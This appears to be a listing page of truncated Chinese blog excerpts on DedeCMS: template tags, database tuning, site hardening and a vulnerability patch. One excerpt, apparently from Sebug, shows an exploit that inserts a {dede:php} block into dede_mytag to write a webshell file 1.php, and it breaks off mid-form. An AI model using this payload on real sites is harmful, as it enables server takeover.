方法一:自己用解密的方式用phpmyadmin登陆后台数据库,查看找到password:去除前三位和后一位,然后拷贝到http://www.cmd5.com/在线解密工具里面解密方法二、自己设定已经知道的password进入站点mysql数据库,在数据库管理(phpmyadmin)里面找到,dede_admin这一表单,例如以下图点击pwd这一项,然后输入c3949ba59abbe56e057f,再点击运行,这样一来,站点后台的登录password就变成了123456。然后登录站点后台,自行改动站点password。 由武...
在dedecms二级栏目分类,使用channelartlist标签实现当前栏目高亮,估计你没试过!不过开发的时候需要了,也就记下来分享给大家!使用channel也可以,但是我们需要dede二级栏目下拉的时候就要用到这个了,呵呵,使用还是非常简单的修改一个channelartlist类就可以了下面介绍如何使用channelartlist标签实现当前栏目高亮1.首先找到“include\taglib\channelartlist.lib.php”文件,打开2.搜索代码 " $pv = new PartView($typeids[$i][‘i...
dedecms中的内容模型是指文章、软件、商品等类型的文章字段模板。在dedecms中,文章数据由文章主表和文章附加表构成,主表存放文章公共拥有的信息,比如标题,添加时间,点击量等,文章附加表存放文章的内容信息,比如普通文章,商品信息,软件信息等。 1.在创建一个新栏目前首先在 核心→频道模型→内容管理模型下创建一个栏目的内容管理模型2.名字标示里输入的是栏目标示(必须是字母和数字)3.在附加表选项中可以修改为栏目标示...
由于版本兼容性等各方面的原因,实际上dedecms的索引有点混乱,如果索引设置得适合,影响dedecmsHTML生成速度的,主要是获得没有按默认按排序的文章列表的时候,由于要重新排序,数据量大时速度会很不理想,可以通过下面几个步骤轻松优化: 1、进入 phpmyadmin ,把 dedecms 站点 dede_archives 除了 ID 主键的索引外的索引删除; 2、用SQL创建如下索引: Alter TABLE `#@__archives` ADD INDEX `click` (`click`); Alter TABLE `...
测试方法:@Sebug.net dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,‘‘{dede:php}$fp =@fopen("1.php", \‘‘a\‘‘);@fwrite($fp, \‘‘\‘‘);echo "OK";@fclose($fp);{/dede:php}‘‘); 再用下面表单提交,shell 就在同目录下1.php。原理自己研究。。。 <form action="" method="post" name=...
一、DeDeCMS基础知识简介1.基本标签一、织梦模板标签的书写格式及注意事项: 1.书写格式: ①{dede:标签名 参数=‘‘} 底层模板{/dede:标签名} ②{dede:标签名 参数=‘值‘/} 2.注意事项 ①标签书写必须使用半角状态; ②如1-①的标签必须有于标签名开始的闭合标签且存在于底层模板的表现; ③如1-②没有底层模板表现,也不存在闭合标签;他的样式被写入到了相应的标签源码中。二、底层模板的概念及调用方...
近遇到一个问题,就是dedecms的导航,是用外部链接的,但是原窗口打开不好看,新窗口打开好点。OK,放狗...1. 查找模板中的head.htm将<li><a href=‘[field:typeurl/]‘>[field:typename/]</a></li>替换成下面的<li><a href=‘[field:typeurl/]‘ target="_blank">[field:typename/]</a></li>但这个方法有个缺陷,就是会将所有的栏目都在新窗口打开,使用时会显得很凌乱。那如何让指定的栏目在新窗口打开呢,请看第二个方法。2. 查找...
[field:id runphp=‘yes‘] $aid = @me; $row = $GLOBALS[‘dsql‘]->GetOne("Select 字段名 From `dede_addon21` where aid=‘$aid‘ ");@me = cn_substr(strip_tags("{$row[‘字段名‘]}"),600);[/field:id]dede_addon21表示自定义字段添加表的名称多个自定义字段调用方式Select 字段名1,字段名2,字段名3 From英文逗号分隔开,调用使用 $row[‘字段名1‘],$row[‘字段名2‘], $row[‘字段名3‘]原文:http://www.cnblogs.com/jueb...
ajax返回所有的用户号码涉及到dede的二次开发的数据类操作 参考地址:织梦DedeCMS的二次开发之数据库类操作https://www.cnblogs.com/TT-1314/p/8256820.htmlajax返回一个包含所有的用户号码的数组js随机生成一个数字,判断,是否在数组中,如果不在,那就保留。 如果在的话,就返回再次生成一个数字。使用dede的验证码参考地址找到了https://www.cnblogs.com/li-sir/p/7736650.html原文:https://www.cnblogs.com/cn-oldboy/p/1299...
织梦系统爆出很多新漏洞,导致许多dedecms网站被挂木马,从被挂到有效防止,下面就来谈一谈具体的方法: 一、精简设置篇: 不需要的功能统统删除。比如不需要会员就将member文件夹删除。删除多余组件是避免被hack注射的最佳办法。将每个目录添加空的index.html,防止目录被访问。 织梦可删除目录列表:member会员功能 special专题功能 install安装程序(必删) company企业模块 plus\guestbook留言板 以及其他模块一般用不...
文档列表 dede:arclist标签: {dede:arclist flag=‘h‘ typeid=‘‘ row=‘‘ col=‘‘ titlelen=‘‘ infolen=‘‘ imgwidth=‘‘ imgheight=‘‘ listtype=‘‘ orderby=‘‘ keyword=‘‘ limit=‘0,1‘} <a href=‘[field:arcurl/]‘>[field:title/]</a> {/dede:arclist}row=‘10‘ 返回文档列表总数typeid=‘‘ 栏目ID,在列表模板和档案模板中一般不需要指定,在首页模板中允许用","分开表示多个栏目;geta...
先说前端的时间字段,随机密码和随机账号<script> //这里用最简单的生成8位随机数,并且,让第一位不为0function sjuid(){var uid=parseInt(Math.random()*89999999+10000000);$(‘#uid‘).val(uid);$(‘.sjuid‘).html(uid);} // 这里生成随机密码function sjpsw(){// 随机密码var str = ‘mnbvcxzasdfghj0123klpoiuytrewq678MNBVCXZLKJH45GFDSAPOIUYT9REWQ‘;//字符串 var len = str.length;//查询字符串长度 var num=8; ...
织梦(DedeCMS)模板也是一种财富,不想自己辛辛苦苦做的模板被盗用,在互联网上出现一些和自己一模一样的网站,就需要做好模板防盗。本文是No牛收集整理自网络,不过网上的版本都没有提供 Nginx 301重定向实现dedecms模板防盗的方法和403文件禁止实现织梦模板防盗,自己狗尾续貂,整合到一起了,方便自己以后查询。以下就是织梦模板防盗的四个方法,希望可以帮到大家。1.系统文件修补法系统文件修补法这种方法呢,显得比较麻烦一点。...
紧接dedecms分享,目录文件单另一个文件。一个程序的目录结构的了解很重要,对一个系统的初次认识很关键:dedecms目录结构:/a:栏目静态页默认生成目录。为利于SEO优化,可以将文件指定到根目录。/data:数据存放目录。Backupdata为数据库备份目录,网站迁移时需拷入。/dede:默认的站点后台管理目录。为网站安全,建议更改名称/image:系统图片存放目录。/include:核心类库文件存放目录。系统目录,一般都是全局函数、类处理文件...
漏洞名称:dedecms cookies泄漏导致SQL漏洞补丁文件:/member/article_add.php补丁来源:云盾自研漏洞描述:dedecms的文章发表表单中泄漏了用于防御CSRF的核心cookie,同时在其他核心支付系统也使用了同样的cookie进行验证,黑客可利用泄漏的cookie通过后台验证,进行后台注入。解决方法搜索代码:if (empty($dede_fieldshash) || $dede_fieldshash != md5($dede_addonfields.$cfg_cookie_encode))如图:修改代码为:if (empty($de...